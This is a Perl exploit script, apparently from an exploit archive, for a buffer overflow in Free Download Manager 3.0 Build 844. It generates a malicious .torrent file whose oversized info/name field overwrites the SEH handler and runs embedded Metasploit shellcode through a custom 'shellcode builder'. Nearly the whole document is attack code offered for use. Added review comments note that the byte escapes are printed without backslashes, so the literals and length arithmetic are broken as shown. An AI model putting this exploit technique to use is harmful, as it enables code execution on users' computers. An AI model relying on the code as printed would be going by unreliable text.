
# Title : Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
# Published : 2009-02-03
# Author : SkD


#!/usr/bin/perl
#
# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
# -----------------------------------------------------------
# Exploit by SkD 			 (skdrat@hotmail.com)
#
# Vendors URL =
# [www.freedownloadmanager.org]
# Download FDM 3.0 Build 844 =
# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
# (Downloaded by over 1.6 million users!)
#
# This is another one of the more advanced exploitation methods
# for buffer overflows using my method called "shell building".
# It utilizes a SEH overflow and then a shellcode builder/assembler
# "builds"/or "assembles" bytes that were deleted by transformation
# of the buffer so that the shellcode will work without a flaw.
# I have been able to do this because of my recent experiences with
# UNICODE based overflows (heap & stack). This is a demonstration
# of how much can still be achieved when the buffer's contents are restricted.
# Of course I could have used my shellhunting technique,
# but this is a new method, and to demonstrate it in a world of
# dying buffer overflows is important for me.
#
# Unfortunately I did not have time to make this a universal exploit
# so it will only work on all NT systems EXCEPT Vista (due to randomized
# heap, etc). But with a few modifications it can work (sure of it).
# Read my notes & comments in the script for more info.
#
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
#
# Note: Author has no responsibility over the damage you do with this!

use strict;
use warnings;

# Leading bencode of the generated .torrent.  Read as bytes it decodes to
#   d8:announce12:AAAAAAAAAAAA7:comment12:commenttttttt13:creation datei1233616507e
#   4:infod6:lengthi91734e4:name12999:
# i.e. the info dictionary's "name" string is declared to be 12999 bytes long,
# and everything assembled below is the value of that one string.  A torrent
# whose info/name runs to thousands of bytes is the anomaly a parser length
# check or a content filter can key on.
# NOTE(review): on this page every escape is printed as `xNN` rather than
# `\xNN`; as shown, the literals are plain ASCII of a different length, so the
# byte arithmetic further down does not match the text as printed.
my $tdata1 = "x64x38x3Ax61x6Ex6Ex6Fx75x6Ex63x65x31x32x3Ax41x41x41x41x41x41x41x41x41x41x41x41x37x3Ax63x6Fx6D".
	     "x6Dx65x6Ex74x31x32x3Ax63x6Fx6Dx6Dx65x6Ex74x74x74x74x74x74x31x33x3Ax63x72x65x61x74x69x6Fx6Ex20".
	     "x64x61x74x65x69x31x32x33x33x36x31x36x35x30x37x65x34x3Ax69x6Ex66x6Fx64x36x3Ax6Cx65x6Ex67x74x68".
	     "x69x39x31x37x33x34x65x34x3Ax6Ex61x6Dx65x31x32x39x39x39x3A";
# Trailing bencode that closes the file after the 12999-byte name value:
#   12:piece lengthi262144e6:pieces20:<20 bytes>ee
my $tdata2 = "x31x32x3Ax70x69x65x63x65x20x6Cx65x6Ex67x74x68x69x32x36x32x31x34x34x65x36x3Ax70x69x65x63x65x73".
	     "x32x30x3Ax10x7FxD5x50xE2x70xA5x80x61x42x7Bx53x08xE0xCExFEx9CxDAx2ExE1x65x65";

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# Payload as generated by the tool named above; per the author's note below,
# a 0x01 byte has been inserted in front of each byte >= 0x80, which the
# "builder" further down is meant to undo once the data is in memory.
my $shellcode =
"x01xebx03x59x01xebx05x01xe8x01xf8x01xffx01xffx01xffx4fx49x49x49x49x49".
#Notice I added 0x01 byte before each 0x80=> byte.
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x50x42x30x4bx58x45x44x4ex43x4bx38x4ex47".
"x45x50x4ax37x41x50x4fx4ex4bx58x4fx54x4ax51x4bx38".
"x4fx45x42x42x41x50x4bx4ex49x54x4bx38x46x53x4bx48".
"x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c".
"x46x37x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x55x46x32x46x30x45x57x45x4ex4bx48".
"x4fx35x46x32x41x50x4bx4ex48x56x4bx58x4ex50x4bx44".
"x4bx48x4fx55x4ex31x41x30x4bx4ex4bx38x4ex41x4bx58".
"x41x30x4bx4ex49x48x4ex55x46x52x46x50x43x4cx41x33".
"x42x4cx46x36x4bx48x42x34x42x53x45x58x42x4cx4ax37".
"x4ex50x4bx58x42x34x4ex30x4bx58x42x57x4ex31x4dx4a".
"x4bx58x4ax46x4ax30x4bx4ex49x50x4bx38x42x58x42x4b".
"x42x50x42x30x42x30x4bx58x4ax36x4ex53x4fx35x41x53".
"x48x4fx42x36x48x35x49x38x4ax4fx43x38x42x4cx4bx37".
"x42x35x4ax36x50x47x4ax4dx44x4ex43x37x4ax56x4ax59".
"x50x4fx4cx48x50x30x47x45x4fx4fx47x4ex43x36x41x56".
"x4ex36x43x46x42x30x5a";

#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
#0x01 before each 0x80=> byte.
# The builder itself is kept within the same restricted byte range; its length
# is what the $sled padding below is sized against (builder + sled = 350).
my $shellcode_builder = ("x59" x 3 ."x40" x 9 . "x51x5b"."x4b" x 4 ."x01x03"."x48" x 10 ."x43x01x03" x 3).
			("x4b" x 3 ."x03x0b" x 35 ."x41" x 14 ."x41x01x01x01x01"."x41x01x01" x 2).
                        ("x49" x 3 ."x48"."x01x01" x 5 ."x40" x 3 ."x01x01x41x01x01").
                        ("x49" x 2 ."x48" x 3 ."x01x01" x 13 ."x40" x 3 ."x01x01x41x01x01").
                        ("x49" x 3 ."x48" x 3 ."x01x01" x 11 ."x49" x 3 ."x01x01" x 11).
                        ("x40" x 3 ."x41x01x01"."x41" x 3 ."x01x01"."x41" x 6 ."x01x01");
# Size of the trailing filler so that the whole name value totals exactly the
# 12999 bytes declared in $tdata1: 10000 ($overflow1) + 12 (label, sehjmp and
# sehret, 4 bytes each) + builder + (350 - builder) sled + shellcode + $len.
# The author flags this as the calculation that places the SEH fields; if any
# component changes length, $len must absorb the difference.
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder));
my $shellcode_builder_label = "x01x01x01x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
my $overflow1 = "x41" x 10000;   # bulk filler that precedes the SEH fields
my $overflow2 = "x41" x $len;    # trailing filler, see $len above
my $sled = "x41" x (350 - length($shellcode_builder));   # pads builder out to 350 bytes
my $sehjmp = "x71x06x01x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)
my $sehret = "x1ax09x03x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)

# Writes the assembled file as "s.torrent" in the current directory.
# NOTE: two-argument open() with no status check; if the file cannot be
# created, the print and close below only produce warnings rather than an error.
open(my $torrent, "> s.torrent");
print $torrent $tdata1.
	       $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
               $tdata2;
close $torrent;
